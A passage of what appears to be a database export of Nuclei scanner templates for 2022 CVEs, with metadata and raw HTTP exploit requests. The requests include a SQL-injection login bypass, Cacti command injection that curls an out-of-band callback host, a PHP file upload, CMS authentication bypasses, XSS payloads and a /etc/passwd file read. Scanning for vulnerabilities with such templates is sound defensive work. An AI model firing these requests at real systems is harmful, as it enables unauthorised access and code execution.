advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true§ion_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n - |\n POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"reqid\"\n\n test\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"cmd\"\n\n upload\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"target\"\n\n l1_Lw\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-php\n\n \n\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"mtime[]\"\n\n test\n -----------------------------213974337328367932543216511988--\n - |\n GET /media/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_6\n words:\n - 751a8ba516522786d551075a092a7a84\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: username_fieldname\n group: 1\n regex:\n - name=\"username_fieldname\" value=\"(.*)\"\n internal: true\n part: body\n\n - type: regex\n name: password_fieldname\n group: 1\n regex:\n - name=\"password_fieldname\" value=\"(.*)\"\n internal: true\n part: body\n\n - type: regex\n name: formtoken\n group: 1\n regex:\n - name=\"formtoken\" value=\"(.*)\"\n internal: true\n part: body\n\n - type: regex\n name: app_name\n group: 1\n regex:\n - name=\"app_name\" value=\"(.*)\"\n internal: true\n part: body\n# digest: 4b0a00483046022100bee894518d0df5b4a5fb8ca9f0483c5c30d8820a121cd0c4cf47e5749e14e6b1022100891072b4407c52cbc62bfa211b7b3a2a4d05c4ccebf5731125a1a427cb36b9a0:922c64590222798bb761d5b6d8e72950", "hash": "e44ff6e8bb6caea177e1a6f1cae1fc1c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d4" }, "name": "CVE-2022-46071.yaml", "content": "id: CVE-2022-46071\n\ninfo:\n name: Helmet Store Showroom v1.0 - SQL Injection\n author: Harsh\n severity: critical\n description: |\n There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://yuyudhn.github.io/CVE-2022-46071/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46071\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-46071\n cwe-id: CWE-89\n epss-score: 0.01454\n epss-percentile: 0.86393\n cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: helmet_store_showroom_site_project\n product: helmet_store_showroom_site\n tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project\n\nhttp:\n - raw:\n - |\n POST /classes/Login.php?f=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username='+OR+1%3D1+--+-&password=1234\n - |\n GET /admin/ HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")'\n condition: and\n# digest: 4b0a004830460221008a28b99414d2dfa37f05b900afd1ede85d6928122a9802832f8cdf91a3f64cb90221008f371160f0cb6a42a2d306a44bbfc66fe9117fac833e12ef28a93ab878e58bbf:922c64590222798bb761d5b6d8e72950", "hash": "5c30cc521912db905603dba21851ba4f", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d5" }, "name": "CVE-2022-46073.yaml", "content": "id: CVE-2022-46073\n\ninfo:\n name: Helmet Store Showroom - Cross Site Scripting\n author: Harsh\n severity: medium\n description: |\n Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://yuyudhn.github.io/CVE-2022-46073/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46073\n - https://www.youtube.com/watch?v=jT09Uiwl0Jo\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-46073\n cwe-id: CWE-79\n epss-score: 0.00094\n epss-percentile: 0.38558\n cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: helmet_store_showroom_project\n product: helmet_store_showroom\n tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"Helmet Store Showroom\")'\n - 'contains(body, \">\")'\n condition: and\n# digest: 4b0a00483046022100ed99835750f27c932a666b47b8ed34582dba5c25daf8c74117a8db9617cbf2b9022100b765f603c369d4027a97f08b675357a4d3f582d39d36c3c9d7b518960c0d05c9:922c64590222798bb761d5b6d8e72950", "hash": "337e51ac3cebd3939c431f41aaa04d4a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d6" }, "name": "CVE-2022-46169.yaml", "content": "id: CVE-2022-46169\n\ninfo:\n name: Cacti <=1.2.22 - Remote Command Injection\n author: Hardik-Solanki,j4vaovo\n severity: critical\n description: |\n Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.\n reference:\n - https://security-tracker.debian.org/tracker/CVE-2022-46169\n - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf\n - https://www.cybersecurity-help.cz/vdb/SB2022121926\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46169\n - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-46169\n cwe-id: CWE-78,CWE-74\n epss-score: 0.96526\n epss-percentile: 0.9958\n cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cacti\n product: cacti\n shodan-query: title:\"Login to Cacti\"\n tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\n Host: {{Hostname}}\n X-Forwarded-For: 127.0.0.1\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"value\":'\n - '\"local_data_id\":'\n condition: and\n\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022071f74228b25467f72a73a0de7752856fcc91f8007aabe12243c65efd266c964e0221008b3834ed9625a3c5474e7bbd30bdd914c70c2d10bdf64aa7f607fa97cc50acd0:922c64590222798bb761d5b6d8e72950", "hash": "16b6533cf65debb15e659f956b861bc2", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d7" }, "name": "CVE-2022-46381.yaml", "content": "id: CVE-2022-46381\n\ninfo:\n name: Linear eMerge E3-Series - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or update provided by the vendor to fix the XSS vulnerability in the Linear eMerge E3-Series.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381\n - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46381\n - https://github.com/amitlttwo/CVE-2022-46381\n - https://github.com/k0mi-tg/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-46381\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.39871\n cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: niceforyou\n product: linear_emerge_e3_access_control_firmware\n shodan-query: http.html:\"Linear eMerge\"\n tags: cve,cve2022,xss,emerge,linear,niceforyou\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/>'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n - 'Badging Template'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202d49a19c38ab4b9a901abd5e6c90fef4882504cb73444882c2105d186ec64932022100ccca00e7eaba64835c620d5df47e2aad6ee450f81abf2f755260439020d500ce:922c64590222798bb761d5b6d8e72950", "hash": "998f28ca70ad6b2accc06bc71c16a9da", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d8" }, "name": "CVE-2022-46443.yaml", "content": "id: CVE-2022-46443\n\ninfo:\n name: Bangresto - SQL Injection\n author: Harsh\n severity: high\n description: |\n Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://yuyudhn.github.io/CVE-2022-46443/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46443\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-46443\n cwe-id: CWE-89\n epss-score: 0.05592\n epss-percentile: 0.93095\n cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: bangresto_project\n product: bangresto\n tags: cve,cve2022,bangresto,sqli,bangresto_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /bangresto-main/staff/process.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username={{username}}&password={{password}}\n - |\n POST /bangresto-main/staff/insertorder.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded;\n\n itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{{md5({{num}})}}'\n# digest: 4a0a00473045022100a3a16c285bb2bbd0ca79228c15a194013e67e2f1d1e2429058ff03750383e808022062c6d347e89f8c3a09499dbc165cb56c864338da5d2dd6976f9a776f7dcef0c9:922c64590222798bb761d5b6d8e72950", "hash": "3bd644aecbdb1ae28ee15155ac6a7bd0", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d9" }, "name": "CVE-2022-46463.yaml", "content": "id: CVE-2022-46463\n\ninfo:\n name: Harbor <=2.5.3 - Unauthorized Access\n author: Arm!tage\n severity: high\n description: |\n An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor.\n remediation: |\n Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46463\n - https://github.com/Vad1mo\n - https://github.com/lanqingaa/123/blob/main/README.md\n - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d\n - https://github.com/lanqingaa/123\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-46463\n cwe-id: CWE-306\n epss-score: 0.01473\n epss-percentile: 0.86471\n cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: linuxfoundation\n product: harbor\n shodan-query: http.favicon.hash:657337228\n tags: cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v2.0/search?q=/\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"repository_name\"\n - \"project_name\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ae28ae8282c8eb129103ba15f2fd67f65c28194c70a1af8a99f9fc022671ca82022100b90c66835be66c887739e09bd92a805dd35a406549624e51b00d6219a27c7810:922c64590222798bb761d5b6d8e72950", "hash": "660063c686b72fe726aede1aa48d8c33", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085da" }, "name": "CVE-2022-46888.yaml", "content": "id: CVE-2022-46888\n\ninfo:\n name: NexusPHP <1.7.33 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..\n remediation: |\n Upgrade to NexusPHP version 1.7.33 or later to mitigate this vulnerability.\n reference:\n - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities\n - https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46888\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-46888\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.40602\n cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nexusphp\n product: nexusphp\n shodan-query: http.favicon.hash:-582931176\n tags: cve,cve2022,nexus,php,nexusphp,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/login.php?secret=\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"\">\">'\n - 'NexusPHP'\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204866b4c509c48b1775499644d345df8c431567004b38f8674c3938f617ec6cb7022100f594663ec51fd629d1fb0e1dc42018110f37b87bf5cef07e0f83faeaf4b3acc7:922c64590222798bb761d5b6d8e72950", "hash": "7c9898b5d32007dfe55cd6347dd6d9df", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085db" }, "name": "CVE-2022-46934.yaml", "content": "id: CVE-2022-46934\n\ninfo:\n name: kkFileView 4.1.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/411\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46934\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-46934\n cwe-id: CWE-79\n epss-score: 0.05604\n epss-percentile: 0.92519\n cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n tags: cve,cve2022,xss,kkfileview,keking\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - document.getElementById(\"http://\");alert(document.domain);//\").click();\n - viewer.min.css\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008687eab5b9874540b862eebf395db04e1b3280e879a414b6e83b1585e9630e3602210088fa6bef6acacfe1d08604f7b405bda69f1dbf7bd2a1b4fa178d4a2ce1fed6f2:922c64590222798bb761d5b6d8e72950", "hash": "992f3edb9b9b1729a705bdcee61df594", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085dc" }, "name": "CVE-2022-47002.yaml", "content": "id: CVE-2022-47002\n\ninfo:\n name: Masa CMS - Authentication Bypass\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: |\n Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.\n remediation: |\n Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS.\n reference:\n - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html\n - https://github.com/MasaCMS/MasaCMS/releases/tag/7.3.10\n - https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47002\n - https://www.hoyahaxa.com/2023/01/preliminary-security-advisory.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47002\n cwe-id: CWE-863\n epss-score: 0.0395\n epss-percentile: 0.91808\n cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: masacms\n product: masacms\n shodan-query: 'Generator: Masa CMS'\n tags: cve,cve2022,auth-bypass,cms,masa,masacms\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\n Host: {{Hostname}}\n Cookie: userid={{uuid}}; userhash=\n\n redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_3,\"\\\"userid\\\"\")'\n condition: and\n\n - type: word\n part: body_3\n words:\n - \"Edit Profile\"\n\n extractors:\n - type: regex\n name: siteid\n group: 1\n regex:\n - 'siteid:\"(.*?)\"'\n internal: true\n part: body\n\n - type: regex\n name: uuid\n group: 1\n regex:\n - '\"lastupdatebyid\":\"([A-F0-9-]+)\"'\n internal: true\n part: body\n# digest: 4a0a00473045022100e3097e1250b20cab477464c81fac1ed317a7219c4e7a2c1a708487b21d40dd1d02202a1a5c6c96fb4cb4b010a4a7fc3023d770492fb35b2e1291eca3d007beb48c8d:922c64590222798bb761d5b6d8e72950", "hash": "32a15cc98630998a0b36d4aa8b618965", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085dd" }, "name": "CVE-2022-47003.yaml", "content": "id: CVE-2022-47003\n\ninfo:\n name: Mura CMS <10.0.580 - Authentication Bypass\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: |\n Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application.\n remediation: |\n Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability.\n reference:\n - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html\n - http://mura.com\n - https://www.murasoftware.com/mura-cms/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47003\n - https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47003\n cwe-id: CWE-863\n epss-score: 0.02341\n epss-percentile: 0.88676\n cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: murasoftware\n product: mura_cms\n shodan-query: 'Generator: Mura CMS'\n tags: cve,cve2022,auth-bypass,cms,mura,murasoftware\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\n Host: {{Hostname}}\n Cookie: userid={{uuid}}; userhash=\n\n redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_3,\"\\\"userid\\\"\")'\n condition: and\n\n - type: word\n part: body_3\n words:\n - \"Edit Profile\"\n\n extractors:\n - type: regex\n name: siteid\n group: 1\n regex:\n - 'siteid:\"(.*?)\"'\n internal: true\n part: body\n\n - type: regex\n name: uuid\n group: 1\n regex:\n - '\"lastupdatebyid\":\"([A-F0-9-]+)\"'\n internal: true\n part: body\n# digest: 490a004630440220440774df54f926d2f453b8d155ef6d625b0cf8b3bd6ae2c520e5bd1f2cd549d80220543f2ab0ffb604510676033c32003ea4f5ad46e6ea52fcd536b79e3eb9d5e4d2:922c64590222798bb761d5b6d8e72950", "hash": "837b4f893a92be4407df6b71f8581860", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085de" }, "name": "CVE-2022-47075.yaml", "content": "id: CVE-2022-47075\n\ninfo:\n name: Smart Office Web 20.28 - Information Disclosure\n author: r3Y3r53\n severity: high\n description: |\n An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.\n reference:\n - https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47075\n - http://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html\n - https://cvewalkthrough.com/smart-office-suite-unauthenticated-data-ex/\n - https://youtu.be/D42upepxzwM\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-47075\n epss-score: 0.00614\n epss-percentile: 0.76423\n cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: smartofficepayroll\n product: smartoffice\n tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ExportReportingManager.aspx\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"application/CSV\")'\n - 'contains(body, \"EmployeeName\") && contains(body, \"EmployeeCode\")'\n condition: and\n# digest: 4a0a0047304502210088fd6b3b11c7336d9211442a34460434445fbf2ed05f120310724e4f87057c8202207cd6f25b4bd701c32a7ecab0dfcb2a4c5ee230b2f1a4dba3370b976ea6c289f1:922c64590222798bb761d5b6d8e72950", "hash": "38a02af55cf1b47344511ad341754647", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085df" }, "name": "CVE-2022-47501.yaml", "content": "id: CVE-2022-47501\n\ninfo:\n name: Apache OFBiz < 18.12.07 - Local File Inclusion\n author: your3cho\n severity: high\n description: |\n Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a pre-authentication attack. This issue affects Apache OFBiz: before 18.12.07.\n reference:\n - https://lists.apache.org/thread/k8s76l0whydy45bfm4b69vq0mf94p3wc\n - http://www.openwall.com/lists/oss-security/2023/04/18/5\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47501\n - http://www.openwall.com/lists/oss-security/2023/04/18/9\n - http://www.openwall.com/lists/oss-security/2023/04/19/1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-47501\n cwe-id: CWE-22\n epss-score: 0.12161\n epss-percentile: 0.94898\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: ofbiz\n shodan-query: \"html:\\\"OFBiz\\\"\"\n fofa-query: \"app=\\\"Apache_OFBiz\\\"\"\n tags: cve,cve2022,apache,ofbiz,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}\"\n\n payloads:\n path:\n - /etc/passwd\n - c:/windows/win.ini\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n condition: and\n# digest: 4b0a00483046022100d211f452a16960f2a6c0e2a0e03cbb6d4c45711575d380ea3dbd44eb90b3b075022100be606f28dd5f235f36b247b778f2be2bbd3a10ad900979d2d63417e35ce02265:922c64590222798bb761d5b6d8e72950", "hash": "28479182f87e3a91b7dd843cbe704655", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e0" }, "name": "CVE-2022-47615.yaml", "content": "id: CVE-2022-47615\n\ninfo:\n name: LearnPress Plugin < 4.2.0 - Local File Inclusion\n author: DhiyaneshDK\n severity: critical\n description: |\n Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure.\n remediation: |\n Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.\n reference:\n - https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47615\n - 